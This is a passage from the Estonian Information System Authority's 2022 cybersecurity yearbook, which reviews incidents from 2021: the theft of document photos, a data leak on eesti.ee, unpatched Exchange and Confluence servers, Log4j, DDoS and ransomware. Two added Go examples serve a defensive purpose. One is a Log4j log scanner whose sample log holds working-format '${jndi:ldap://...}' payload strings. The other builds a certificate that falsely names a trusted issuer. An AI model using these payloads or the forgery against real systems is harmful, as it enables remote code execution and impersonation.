Cyber Security in Estonia 2022
Contents

6  Learning From Security Vulnerabilities Makes Us Stronger
Last year will go down in history as the year of security vulnerabilities, where in the race against time and criminals, we had to learn some painful lessons. However, all experiences are useful and must be shared, says Gert Auväärt, Director of the Cyber Security Branch of the Information System Authority (RIA).

8  The Situation in Cyberspace: A Year of Security Vulnerabilities
2021 will go down in the history of cybersecurity as a year of major security vulnerabilities. The largest of these was the vulnerability identified in the Log4j logging application, but there were also those that only affected the Estonian e-state.

14  How Did a Hacker Steal 300,000 Document Photos?
One of the most serious incidents last year was due to a security vulnerability in the service of RIA. The attacker downloaded nearly 300,000 document photos, but was caught a few days after the data theft was discovered.

16  Legacy Brought Bad Surprises
The access rights system of the state portal eesti.ee was a painful reminder that if the attitude towards data protection changes, so must the information system.

18  Patching Vulnerabilities Is Still a Problem
People tend to put off until tomorrow what they can do today. Last year, we saw all too often what happens when this principle is followed when fixing critical vulnerabilities.

20  Log4j Caused an IT Earthquake
In December, IT professionals had to respond to one of the biggest security vulnerabilities in recent years: the Log4j zero-day vulnerability. The IT community witnessed a severe earthquake all over the world at the same time and started preparing for a devastating tsunami.

22  In 2021, There Were 50% More Denial-Of-Service Attacks Than Last Year
Last year, we registered 47 impactful denial-of-service attacks, which is twice as many as in 2020. Until the spring, ransom denial-of-service attacks targeted companies, but in the autumn, schools and learning environments became the victims.

24  Financial Fraud Has Become More Diverse
Last year, we received 20% more reports of fraud than the year before about incidents in which Estonian people and companies lost money. RIA only sees the tip of the iceberg, because victims of financial fraud turn primarily to the police.

28  Cannot Get Through the Gate Until the Gate is Open
Most of us follow simple principles to ensure our physical security, but many seem to think that digital assets are able to protect themselves, writes Oskar Gross, Head of the Cybercrime Unit of the Central Criminal Police.

30  Ransomware Attacks Rarely Have a Happy Ending
While heroes in Hollywood hostage films are usually able to escape, in hostage-taking in cyberspace, where criminals gain access to corporate or personal information, the victim often has to choose between bad and very bad options.

32  What Did We Learn From the Local Elections?
Some functional errors caused public disapproval, but we did not identify any malicious activity that could have impacted the 2021 local elections.

34  Hackers, Help the State!
We are working on a model that would allow state agencies to work with hackers and pay them for information about security vulnerabilities.

36  What Happened in International Cyberspace in 2021?
Last year, news of cyber incidents and security reached even those who had not heard of these topics before. Many incidents directly and severely disrupted the daily lives of people and crossed the news threshold.

40  Potential Disasters Avoided
When it comes to cybersecurity, the focus is often on high-impact incidents and the damage they cause: be it stolen data, encrypted systems, or lost money. However, there are also incidents with a happy ending.

42  The Cyber Hygiene of the Estonian Population is Improving
The level of the cyber hygiene of the Estonian population has improved in three years, but there is room for improvement, according to data collected in cooperation with Statistics Estonia.

44  What Will 2022 Bring in Cyberspace?
Last year brought a lot of security vulnerabilities and a ransomware epidemic. What's in store this year?
● FOREWORD

Learning From Security Vulnerabilities Makes Us Stronger

Last year will go down in history as the year of security vulnerabilities, where in the race against time and criminals, we had to learn some painful lessons. However, all experiences are useful and must be shared, says Gert Auväärt, Director of the Cyber Security Branch of the Information System Authority (RIA).

My time in RIA started with big challenges. In July, two critical weaknesses were identified in our own systems that allowed access to users' personal data. In essence, you could say that even though the door was locked, the key had been left nearby.

A month later, we found out about possible vulnerabilities in other national e-services, as a result of which some personal data was not appropriately protected. Vulnerabilities in the real estate and marital property register were patched and according to our current knowledge, the data had not been misused in any way.

SECURITY COMES FROM COOPERATION

Both incidents with our services, the data leak of access rights in the self-service environment of eesti.ee for entrepreneurs and the illegal download of document photos (both cases will be discussed in more detail in this yearbook), happened partly due to the fact that old system interfaces are still present in some services and have not been renewed. We have carried out an internal analysis of these cases and streamlined the processes within RIA to avoid incidents like this in the future.

In both cases, we received the first indication that something may be wrong from people outside of our organisation. This illustrates that the state alone may not be able to find the weaknesses of a 20-year-old e-state and that security can be created in partnership with the community. It is very important that we all take security vulnerabilities seriously and patch them. We must share information because it allows us to learn from others, and we must not ignore tips and suggestions. The consequences of the vulnerabilities depend on the speed with which we act – whether we are able to patch them before criminals manage to exploit them.

WARNINGS ARE NOT TAKEN SERIOUSLY

In March last year, when Microsoft disclosed its Exchange server vulnerability and provided information on how to patch it, we notified our partners and other authorities. However, a week later our monitoring revealed that two-thirds of those informed had not yet taken the necessary action. The e-mail servers of these organisations were still vulnerable, meaning that the mailboxes of the employees were essentially unprotected. The warning had not been taken seriously.

Unpatched systems usually result in criminals finding them and compromising them – installing malware, stealing data, etc. Cybercrime is one of the most lucrative and thus the fastest growing types of crime in the world. However, catching those criminals is difficult, as it is easier to hide traces in cyberspace and the consequences of crime can appear after several years.

IT systems around the world are being attacked all the time, and the security vulnerabilities that have been discovered and made public can be of great benefit to those who are trying to get rich or gain influence. RIA registers more than 20,000 notifications and nearly 2,500 cyber incidents a year that have a real impact on the system or how it works. Although most attempts to attack fail, we must stay vigilant.

FOR A SAFER ESTONIA

Ransomware attacks, which are becoming more and more popular in the world, cause losses to entrepreneurs that are comparable to the budget of an average Estonian state agency. Estonia has not yet been successfully targeted with high-impact ransomware attacks, but it is only a matter of time as our daily lives, including the functioning of the country, depend on digital services.

Although the security of the systems is the responsibility of their owner, we must all play our part. Just as the state must protect its people who have entrusted their data to it, so must any other owner of a database or service. The digital society is based on trust.

In order to protect the reliability and security of our e-state, we have also increased our capabilities in RIA, both in terms of people as well as our tools and infrastructure. We put together a team of testers, developed a bug bounty programme to detect and patch service vulnerabilities, and increased the security of the state network.

In order to create and maintain security, we have taken another important step in RIA: the Estonian Information Security Standard (E-ITS) is finally ready. This is the most important guide for companies to prevent potential risks. At the end of 2021, the first pilot group started its work, the main role of which is to develop best practices in the implementation of the standard and to prepare new E-ITS experience consultants. Together with the University of Tartu, the initial E-ITS-based maturity model was completed, which gives organisations a quick assessment of their information security situation and allows authorities to compare the level of information security.

That is how we are building a safer Estonia step by step. ●

GERT AUVÄÄRT
Director of the Cyber Security Branch of RIA
The Situation in Cyberspace: A Year of Security Vulnerabilities

2021 will go down in the history of cybersecurity as a year of major security vulnerabilities. The largest of these was the vulnerability identified in the Log4j logging application, but there were also those that only affected the Estonian e-state.
There are security vulnerabilities in almost every system and in every code – you just have to search for them. Most of them are identified and addressed quickly. It is a common practice in information security communities that the person who discovers a security vulnerability notifies the owner of the system or service first. They give enough time to develop security patches or code updates, and only then reveal the vulnerability to the rest of the world. This was not the case with the major security vulnerabilities discovered in 2021. Serious security vulnerabilities have impacted the society before, but in 2021, there seemed to be no end to them.

IF YOU DO NOT KNOW YET THAT YOU ARE VULNERABLE

In 2021, the Estonian society was probably most affected by the news that an attacker found a security vulnerability in the system managed by the Information System Authority (RIA) and obtained document photos of hundreds of thousands of people (you can read more about this attack on page 14). Although the vulnerability only gave the attacker access to document photos – with which one can do almost nothing in the age of digital documents – it raised legitimate concerns about whether the Estonian e-state can keep data secure and protect it from thieves. However, the course of the incident proved that the principle of data separation we use in our e-state is correct. Every query for a document photo left a trace, which allowed the police to detain the attacker, and he was not able to obtain any other data.

By security vulnerabilities, we also mean configuration errors. One of these was discovered by an observant citizen in the self-service environment of eesti.ee for entrepreneurs, where the first and last names, personal identification codes, places of work, and, in some cases, connections with previous positions of more than 300,000 people related to legal entities were visible. The system was originally designed so that authorised persons could see the data of other authorised persons, and it had not been updated over the years. We are extremely grateful that the case was reported to us: we were able to fix the bug before the general public or a malicious attacker had the opportunity to view or misuse third-party data.

A security vulnerability that is so new that only an attacker knows about it and the owner of the service has not even had a day to fix it is called a zero-day vulnerability. However, if an update to a vulnerable service already exists, it is a whole other story. Unfortunately, owners of larger networks and e-services often do not have a detailed overview of all their online services and their vulnerabilities. The owners should look at their IT infrastructure through the eyes of an attacker, as attackers are constantly looking for security flaws.

At the end of 2020, the Ministry of Economic Affairs and Communications, the Ministry of Social Affairs, and the Ministry of Foreign Affairs were attacked, and we saw attacks with similar handwriting also in 2021. What is common for all of them is that the attacker scanned web servers with publicly available tools, found security vulnerabilities, uploaded malicious code, and thus gained unauthorised access to the servers.

In February, we were informed that a company which provides cloud services and software to many public sector authorities (ministries and local governments) and another company which provides remote access services to public sector authorities had been compromised. Both of them handled the incidents professionally: they fixed their services, informed customers, and worked in full cooperation with CERT-EE.

[Figure: Incidents and notifications in 2021, bars for the years 2017 to 2021. Series: Number of reports; Incidents with an impact; Automated infection notifications; Automated security vulnerability notifications.]

IF THE WHOLE WORLD KNOWS YOU ARE VULNERABLE

The public will only hear about the consequences of some security vulnerabilities much later, as their effects may become apparent in a matter of months. In March, Microsoft disclosed four zero-day vulnerabilities in its mail server software that allowed attackers extensive access to the entire server, including e-mails and passwords. According to Microsoft, the attackers quickly built tools that began searching the entire world for vulnerable Exchange servers that had not been updated, and once they found them, the servers were compromised and infected with malware.

At the end of August, Atlassian announced that their world-wide wiki platform Confluence also had a critical security vulnerability that required a software update. Confluence is commonly used for business process documentation or internal web sites. By early September, attackers had already been able to exploit the vulnerability and use automated systems to gain access to Confluence servers exposed to the Internet around the world, including in Estonia (see page 18 for more information).

The security vulnerability with the greatest impact was only revealed at the end of the year, when players on the popular Minecraft gaming platform began experimenting with a newly discovered security vulnerability that allowed them to send commands to the game server. The critical security vulnerability Log4Shell, identified in the Log4j logging function of the Java programming language, which is used in billions of devices and software products around the world, had already been patched by the manufacturer, but these same devices and the software used in them had not been updated yet.

As news of the vulnerability spread, IT professionals, developers, and security professionals around the world rushed to update the Log4j function in their own software and then wait for software updates for all their other products: industrial devices, network devices, antivirus software, web services, and more. This was also the case in Estonia, as many Estonian e-services use the hugely popular Java programming language as well as the Log4j function.

The general public may not have noticed this, but the combined effort of the global IT community to identify the extent of the vulnerability and to support each other was impressive. IT professionals did not mind national borders or open-source versus commercial services, and occasionally they even forgot their sleep and loved ones. However, we will most likely see the full impact of the Log4j vulnerability only later, when it becomes clear how much the attackers managed to exploit the vulnerability before it was patched.

Log4j vulnerability – what is it?

The critical security vulnerability Log4Shell was identified in the Log4j function of the Java programming language used in billions of devices and software products around the world. The severity of the security vulnerability is rated the highest possible by the international CVE standard (10 out of 10 points), potentially allowing an attacker to run their code freely on a vulnerable device.

An attacker could exploit the vulnerability by sending a command in a specific format to a vulnerable server, device, or system (beginning with '${jndi:') and adding a reference to malware that may be located on a third-party server. The vulnerable server logs the command, Log4j searches for the uploaded malware, downloads it, and runs it. Depending on the nature of the malware, it may give a third party access to the device.

IT ALL STARTS WITH ACCESS: RANSOMWARE AND OTHER INCIDENTS

Ransomware attacks received a lot of attention around the world this year – and for good reason. The attack on Colonial Pipeline, a U.S. fuel supplier, made headlines, halting fuel supplies to the U.S. East Coast, but multi-million-dollar ransom demands and encrypted IT systems caused widespread problems in many countries.

Incidents with an impact in 2021 (altogether 2,237 incidents):
Phishing: 775
Malicious redirect: 262
Service interruption: 254
Other: 178
Account takeover: 170
Compromised accounts: 168
Fraud: 99
Botnet: 98
Malware: 79
Denial-of-service attack: 47
Data leak: 43
SEO spam: 34
Ransomware: 30

The most expensive ransomware attacks usually target companies operating in the United States or in the wider English-speaking business environment. In Estonia, ransomware incidents involve smaller enterprises, and the demands are usually in the range from a few thousand euros to tens of thousands of euros. We were informed of a total of 30 ransomware incidents in 2021 (33 in 2020). It seems that the small size of Estonia and our language environment works in our favour, as does the steadily improving cyber hygiene.

Cyber hygiene and compliance with standards are relatively effective against ransomware attacks. In 2021, attackers accessed the systems of their victims mostly through a remote desktop application (Remote Desktop Protocol or RDP in Windows). Some versions have publicly known security vulnerabilities, and in some cases, passwords that are still in use can be found in leaked password databases.

IT companies providing services to third parties should pay special attention to the prevention of potential ransomware attacks. In April, we learned of a case where a ransomware attack targeted an IT service company, through which it spread to four more companies. In May, there was an attempt to launch a ransomware attack against a local government which had been accessed through an accounting service provider that had been compromised.

On many occasions, CERT-EE specialists have been able to help recover data that is encrypted with ransomware without the victims having to pay the ransom. Sometimes, ransomware has left much of the data available (for example, it encrypts only the beginning or the end of the files); other times, decryptors can be found to recover the data. In case of a ransomware incident, we encourage companies to contact CERT-EE and to always keep in mind that paying the ransom only motivates the criminals to launch further attacks.

WHAT HAPPENED TO THE YEAR OF PHISHING?

We called 2020 the year of phishing in the last yearbook – the number of phishing sites had increased by a fifth, and phishing was often a means by which attackers could learn the passwords of an employee of an organisation.

Phishing attacks continued in 2021. The number of phishing site incidents increased both in percentage (35% of all incidents with an impact compared to 26% a year earlier) and in overall numbers (755 in 2021 and 711 in 2020, respectively). These figures reflect how many times phishing sites have been taken down at the request of CERT-EE specialists; the numbers of notifications are much higher.

Similarly to the year before, the sites can be broadly divided into two: bank account phishing and account credentials phishing. The phishing sites are usually almost identical to the originals, but the address is different. In the case of bank account phishing, the victim unknowingly sends money to the wrong account, and the passwords entered on the account credentials phishing sites are most often used to break into e-mail accounts. As a rule, using multi-factor authentication helps to protect your account even if you have accidentally entered your password on a phishing site.

Bank account phishing attacks that have targeted Estonians for several years are already familiar to us. It seems more profitable for the criminals to call victims and persuade them to send money. In terms of account details, however, it does not look like the phishing attacks will cease any time soon.

BOTNETS ENABLE NEW DENIAL-OF-SERVICE ATTACKS

The unpleasant surprise of 2021 was the high impact of distributed denial-of-service (DDoS) attacks. The overall figures also show an increase: compared to 2020, the number of major DDoS attacks increased from 32 to 47 (these are the attacks that were reported to CERT-EE). We have also gained better visibility of smaller DDoS attacks since the summer of 2020, which also shows a clear upward trend.

In 2021, we saw several waves of DDoS attacks with a significant impact. In January and February, several banks and technology companies operating in Estonia received DDoS attacks accompanied by extortion letters. Similar attacks had been carried out on the same companies three months earlier, and the threatening letters referred to previous attacks, saying 'we have not received your payment', 'we are back now, pay off', and 'if you do not pay us now, we will be back soon'. Similar attacks took place in other European countries (at least in five Member States according to CERT-EU) and beyond.

We also saw the first attack on a school in Tallinn in January, which briefly disrupted the work of educational institutions throughout the city. This became a trend in spring and autumn. Since September, we have seen continuous short-term attacks on general education schools, vocational training institutions, universities, as well as the e-learning environments managed by the Education and Youth Board.

The attacks are often ordered by schoolchildren from relatively accessible online forums. In such places, DDoS attacks are offered as a service: an attacker has amassed a large number of routers and other IoT devices with security vulnerabilities or poor configuration in a botnet and is using it to launch DDoS attacks for a small sum of money.

However, these attacks affect not only the infrastructure of that school, but also other authorities that use the same name servers, for example.

In one of the denial-of-service attacks in May, we identified a router with a security vulnerability in Estonia that was connected to a botnet and participated in an attack on a vocational educational institution. We informed the owner of the router, and at least this device can no longer be used for a DDoS attack. Read more about denial-of-service attacks on page 22.

This incident also shows that security vulnerabilities, out-of-date software, and configuration errors enable attacks that have a major impact on our daily lives. Therefore, it is extremely important for device and system owners to pay full attention to security patches and security vulnerability notifications (including the daily notifications of CERT-EE). This way, you can trust that your router, smart TV, or fridge does not give attackers a chance to disrupt Estonian life. ●
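The Log4j sidebar above describes the lookup string that a vulnerable server logs and then follows to a third-party server. The following detector is an added example, not code from the yearbook or from RIA: it scans a constructed web server access log (RFC 5737 test addresses) for that '${jndi:' pattern, URL-decodes lines first because web servers keep the raw request, and lists the servers referenced so that outbound connections to them can be blocked and the attempt reported.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one JNDI lookup seen in a log line: where it was and where it pointed.
type Finding struct {
	Line   int    // 1-based index of the log line
	Scheme string // lookup protocol named after "${jndi:", e.g. ldap or rmi
	Host   string // third-party server the lookup refers to
}

// jndiPattern matches the format described on the page: "${jndi:" followed by a
// scheme, "://" and the host of the server the payload points at. The match is
// case-insensitive so that capitalisation differences do not hide a hit.
var jndiPattern = regexp.MustCompile(`(?i)\$\{jndi:([a-z]+)://([^/:}\s]+)`)

// normalise URL-decodes a line, because web servers store the raw request line and
// probes often arrive percent-encoded in the path or query string.
func normalise(line string) string {
	if decoded, err := url.PathUnescape(line); err == nil {
		return decoded
	}
	return line
}

// ScanLogLines returns one Finding for every JNDI lookup found in the given lines.
func ScanLogLines(lines []string) []Finding {
	var findings []Finding
	for i, raw := range lines {
		for _, m := range jndiPattern.FindAllStringSubmatch(normalise(raw), -1) {
			findings = append(findings, Finding{Line: i + 1, Scheme: strings.ToLower(m[1]), Host: m[2]})
		}
	}
	return findings
}

// UniqueHosts lists the distinct servers referenced, in first-seen order, as input for
// egress blocking and for the report to the CERT.
func UniqueHosts(findings []Finding) []string {
	seen := map[string]bool{}
	var hosts []string
	for _, f := range findings {
		if !seen[f.Host] {
			seen[f.Host] = true
			hosts = append(hosts, f.Host)
		}
	}
	return hosts
}

// SampleLog is a constructed access log: two benign requests, one probe carried in the
// User-Agent header and one percent-encoded probe in the query string.
var SampleLog = []string{
	`203.0.113.5 - - [10/Dec/2021:22:14:03 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`203.0.113.9 - - [10/Dec/2021:22:14:07 +0200] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"`,
	`203.0.113.9 - - [10/Dec/2021:22:14:09 +0200] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"`,
	`203.0.113.12 - - [10/Dec/2021:22:15:00 +0200] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"`,
}

func main() {
	findings := ScanLogLines(SampleLog)
	for _, f := range findings {
		fmt.Printf("line %d: jndi lookup via %s to %s\n", f.Line, f.Scheme, f.Host)
	}
	fmt.Println("hosts to block and report:", UniqueHosts(findings))
}
```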
How Did a Hacker Steal 300,000 Document Photos?

One of the most serious incidents last year was due to a security vulnerability in the service of the Information System Authority (RIA). The attacker downloaded nearly 300,000 document photos, but was caught a few days after the data theft was discovered.

On 21 July, CERT-EE detected that 286,438 document photos had been illegally downloaded from the database of identity documents. They had been downloaded en masse from 9,000 Estonian and foreign IP addresses since 12 July. This was caused by a security vulnerability in the photo transfer service (the so-called photo service) that is used when a person wants to download their document photo.

You can download your document photo either directly from the state portal or through the DigiDoc application. In both cases, the person must first authenticate themselves. Once the request has been made, the system requests the photo from the service that mediates it, the so-called photo service, which is managed by RIA. The photo service requests the photo over the X-tee from the database of identity documents, which belongs to the Police and Border Guard Board, and sends it back to the person. Upon detection of the attack, RIA temporarily closed this function for DigiDoc.

HOW WAS THE ATTACKER ABLE TO DOWNLOAD THE PHOTOS?

DigiDoc makes requests over a public URL. By manipulating this, the attacker managed to give the photo service the impression that the request comes from an authenticated user who wants to download their document photo. However, behind the request was an attacker who turned directly to the photo service using forged or self-created certificates (see figure). To create a fake certificate, the attacker had to have the personal identification code and name of the person.

[Figure: DigiDoc (PIN1 + certificate) and eesti.ee authenticate the person through the state authentication service (identification); the photo service then fetches the photo from the database of identity documents over the X-tee (secure communication). The attacker sends a fake certificate directly to the photo service. The service does not fully verify the validity of the certificate and sends a document photo.]

The photo service should have recognised that the certificates used by the attacker were not issued by SK ID Solutions – that they were forged. Although the attacker had marked SK ID Solutions as the issuer of the fake certificates, 'looking in' them would have shown that they actually came from elsewhere. Due to the security vulnerability, the service did not do this.

As a result of the attack, the criminal did not have access to the database of identity documents, but managed to download document photos from it. A few days after the discovery, the security vulnerability was patched and RIA reopened the photo service for DigiDoc so that people could download their document photos again.

WHAT CAUSED THIS SECURITY VULNERABILITY?

Reportedly, the security vulnerability in the photo transfer service occurred in November 2018. The interruption of the service was probably related to the exchange of ID-card certificates – changes were made in the information systems to support authentication with new certificates.

CERT-EE analysed logs starting from 30 June 2018 and found no other anomalies. This leads to the conclusion that the security vulnerability of the photo transfer service had not been abused before (i.e. before July 2021).

The police detained the suspect a few days after the incident was discovered and confiscated the downloaded data. Preliminary information suggested that the photos were simply stored on the computer of the attacker. The proceedings conducted by the Office of the Prosecutor General are still ongoing.

It is not common for attackers behind cyber incidents to be caught so quickly. They are often located abroad and their traces are difficult – if not impossible – to detect. In this case, we managed to do so thanks to quick and efficient cooperation between the police, CERT-EE, and the Prosecutor's Office. ●

Lessons from the photo theft

RIA analysed and improved its workflows to prevent future incidents caused by such security vulnerabilities. In addition, the case inspired us to create a national bug bounty programme to motivate good hackers. This means that in the future, hackers who have discovered security vulnerabilities in state systems may receive a reward from the state. However, the reward is only paid if the hacker follows the established rules and conditions. The rewards programme is currently being worked on.
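The article above says the photo service accepted certificates that merely named the trusted issuer instead of checking that the issuer had actually signed them. The following Go program is an added example, not RIA's code: it builds a constructed CA (a stand-in for the real issuer), a genuine client certificate signed by it, and a forged one whose issuer name is copied but which is signed with the attacker's own key, then shows that an issuer-name comparison accepts both while a full chain verification rejects the forgery. All names and ID codes in it are constructed placeholders.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// trustedIssuer is a constructed stand-in for the real certificate issuer named on the page.
var trustedIssuer = pkix.Name{CommonName: "Example Trusted CA", Organization: []string{"Example CA Ltd"}}

var serial int64 // unique serial numbers for the constructed certificates

func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// makeCert issues a certificate for subject with the given key. If parent is nil the
// certificate is self-signed (a CA root); otherwise it is signed by parent/parentKey.
func makeCert(subject pkix.Name, key *ecdsa.PrivateKey, parent *x509.Certificate, parentKey *ecdsa.PrivateKey, isCA bool) *x509.Certificate {
	serial++
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               subject,
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
		KeyUsage:              x509.KeyUsageDigitalSignature,
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}
	}
	signer, signerKey := tmpl, key
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert
}

// NaiveCheck mirrors the flawed logic described on the page: it only compares the issuer
// name the certificate claims, which anyone can copy into a self-made certificate.
func NaiveCheck(cert *x509.Certificate) bool {
	return cert.Issuer.String() == trustedIssuer.String()
}

// ProperCheck verifies the signature chain up to the trusted root, so a certificate that
// merely names the trusted issuer but was signed with some other key is rejected.
func ProperCheck(cert *x509.Certificate, root *x509.Certificate) bool {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	_, err := cert.Verify(x509.VerifyOptions{
		Roots:     roots,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	return err == nil
}

// Result holds the outcome of both checks for the genuine and the forged certificate.
type Result struct {
	NaiveGenuine, NaiveForged, ProperGenuine, ProperForged bool
}

// Scenario builds the genuine chain and a forged one whose issuer name matches the trusted CA.
func Scenario() Result {
	person := pkix.Name{CommonName: "Sample Person", SerialNumber: "CONSTRUCTED-ID-CODE"}

	caKey := newKey()
	ca := makeCert(trustedIssuer, caKey, nil, caKey, true)
	genuine := makeCert(person, newKey(), ca, caKey, false)

	// The forger knows the person's name and ID code and the issuer's name, but not the
	// issuer's private key, so they sign with their own "CA" that copies the subject name.
	fakeKey := newKey()
	fakeCA := makeCert(trustedIssuer, fakeKey, nil, fakeKey, true)
	forged := makeCert(person, newKey(), fakeCA, fakeKey, false)

	return Result{
		NaiveGenuine:  NaiveCheck(genuine),
		NaiveForged:   NaiveCheck(forged),
		ProperGenuine: ProperCheck(genuine, ca),
		ProperForged:  ProperCheck(forged, ca),
	}
}

func main() {
	fmt.Printf("%+v\n", Scenario())
}
```

The difference between the two checks is the whole bug: the issuer field is attacker-controlled data, while the signature can only be produced by the issuer's private key.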
Legacy Brought Bad Surprises

Last summer, we got a painful reminder that if the attitude towards data protection changes, so must the information system.

On 6 July, an entrepreneur informed us that on the website for entrepreneurs on the state portal eesti.ee, a database with 336,733 data rows was available to users authenticated in the self-service environment of the access rights management system (AAR). The first and last names, personal identification codes, places of work, and, in some cases, connections with previous positions and roles (e.g. job title, start and end date of employment) of people were visible. The database contained persons from both the public and private sectors.

This data was visible to the people appointed to represent the authority or company, i.e. to all those for whom there was a row in the same database. All data rows became visible when somebody performed a so-called empty or parameterless search. The person also saw the data of others when, for example, they searched for 'Paul' – in which case they were shown all the people called Paul in the database.

It was not a classic cyber incident – the system was not attacked or broken. However, that information should not have been visible in that way. So what happened?

THE SYSTEM BECAME OUTDATED

The entire administration system for access rights – including its self-service environment on the state portal – was designed and built so that all data is visible to all people in the database. The world around this system has changed, especially the approach to data protection. Thus, the structure of the system became inappropriate.

It was clear we had to change it. In July, the Information System Authority (RIA) closed the self-service environment of the access rights system on the state portal. Now, the RIA helpdesk must be contacted at help@ria.ee to change roles and grant accesses. Before, customers themselves could provide access quickly and directly. Now, however, it has become a little more inconvenient. It takes more time and effort to create an authorisation, digitally sign it, send it to RIA, and receive a response.

We did not consider it appropriate to contribute to the thorough development of the old system to reopen the self-service environment there. One important argument was that RIA is already developing a new administration system for access rights, Pääsuke. Another important argument was that changing old systems, or so-called legacy systems, may not be as easy as one might think.

A WIDER PROBLEM

Legacy is a system, technology, or software that is still running but is actually outdated and becoming more and more vulnerable over time. Legacy is a problem in many long-established companies and authorities. For example, the current owners of a system developed 10 years ago may not have a full understanding of its structure and functions. Organisations change over time, people are replaced, and often, the solutions put in place are not properly documented for the new employees. Therefore, it is often not known exactly what effect an upgrade of one part may have on another part of the system.

Outdated systems are used in both the public and private sectors. This is understandable in many ways – replacing the legacy is costly and time-consuming and can also lead to a change in the usual functionalities. So what can you do? The first step could be to get to know the legacy systems of your organisation. This gives you an idea of the state of the system, what features it offers, as well as its vulnerabilities and cross-dependencies. This is exactly what RIA has done. We have become even more familiar with our legacy and set up processes so that our systems are updated at all times. ●

What is the AAR?

The AAR, or administration system for access rights, is a system for authorised persons of an authority or a company in which they can provide others access to various services. For example, the head of a company can grant rights to an accountant to transfer employee data to the employment register maintained by the Tax and Customs Board.

The state is contributing to the solution of the problem with legacy systems

An additional 14.4 million euros was allocated from the state budget in 2022 for the updating and maintenance of outdated information systems and platforms. In addition, the government allocated 500,000 euros from the reserve fund for additional investments for the rapid updating and, if necessary, closure of the outdated information systems of the state portal eesti.ee.
Patching Vulnerabilities Is Still a Problem

People tend to put off until tomorrow what they can do today. Last year, we saw all too often what happens when this principle is followed when fixing critical vulnerabilities.

On 2 March 2021, Microsoft announced that the popular e-mail server software Exchange Server had four zero-day vulnerabilities that could allow an attacker to install malware on the server of the victim and gain access to their e-mail, contacts, passwords, and administrator privileges. In the same announcement, Microsoft also released security patches and asked users to install them as soon as possible.

Until that point, few people knew about the vulnerabilities (according to Microsoft, they were used for attacks by the Chinese cyber group HAFNIUM), but from 2 March, the information was available to everyone. This marked the start of the race against time – between the attackers who used automated tools to search for and attack vulnerable mail servers and the server owners and administrators who now had the means to patch the vulnerability.

THE MAÑANA ATTITUDE DOES NOT HELP

In many cases, the attackers won. On 3 March, Microsoft announced that there were ‘a limited number of victims’. On 8 March, however, there were more than 60,000. The day after the vulnerabilities were disclosed, CERT-EE identified more than 80 mail servers with the mentioned vulnerabilities in the Estonian cyberspace. We informed their owners and administrators, as well as public sector security managers and vital and important service providers. When we repeated the monitoring on 10 March, we unfortunately discovered that two-thirds of these servers were still using unpatched software and were therefore vulnerable to attacks. While three-quarters of the vulnerable servers were patched worldwide in a week, only a third were patched in Estonia.

Therefore, we were not surprised by reports of compromised mail servers. The criminals managed to attack local governments and private companies, as well as the medical sector and educational institutions.

Speed matters

There is nothing new about critical security vulnerabilities in software, but the pace at which cyber groups and individual criminals detect and compromise unpatched systems is unprecedented. It used to take weeks, but now, it only takes days or hours. Those responsible for cyber security must keep pace and patch dangerous security vulnerabilities as soon as possible, rather than postponing them.

Record number of vulnerabilities

- The National Vulnerability Database (NVD) of the US National Institute of Standards and Technology (NIST) recorded 20,046 vulnerabilities in 2021 (18,351 in 2020, 17,382 in 2019, and 17,252 in 2018).
- Attackers did not need good technical skills to take advantage of 90 per cent of these vulnerabilities.
- For 61 per cent of the vulnerabilities, carrying out an attack did not require any action on the part of the victim: clicking on a link, sharing passwords, launching software, or the like.

DIFFERENT SOFTWARE, THE SAME SCHEME

A similar sequence unfolded in late August and early September. On 25 August, Atlassian, the maker of the wiki platform, announced that their Confluence software contained a critical vulnerability that could allow remote code execution. The security vulnerability allowed an unauthenticated user to compromise the Confluence server of an enterprise or authority and edit, add, delete, and/or copy data there. In addition, it allowed malicious code to be installed on the systems of the victim to mine cryptocurrency or create a backdoor to carry out new attacks. Atlassian rated the threat severity of these vulnerabilities with 9.8 on a ten-point scale.

Confluence is not as common as Microsoft Exchange, but it is also used by many Estonian state agencies and private companies as an intranet platform. In September, we learned that three state agencies had been attacked through this security vulnerability. Early detection of the attackers allowed the agencies to avoid major damage, but these attacks would have been preventable if the software had been updated in time. ●
Log4j Caused an IT Earthquake

On 9 December, IT professionals had to respond to one of the biggest security vulnerabilities in recent years: the Log4j zero day vulnerability. The IT community witnessed a severe earthquake all over the world at the same time and started preparing for a devastating tsunami.

Java is one of the most widely used software development platforms. Its open source logging framework Log4j is very common – billions of computers use it to keep apps and services running. The function is used by Apple, Steam, Twitter, Amazon, Tesla, IBM, Minecraft, LinkedIn, and thousands of other well-known and lesser-known companies.

WHAT IS THE LOG4J FUNCTION?

Each software logs or stores data in one way or another to have an overview of what is going on with the software. This is necessary for three reasons: to keep the software running, for development, and for ensuring security. Logging or storing data is essential.

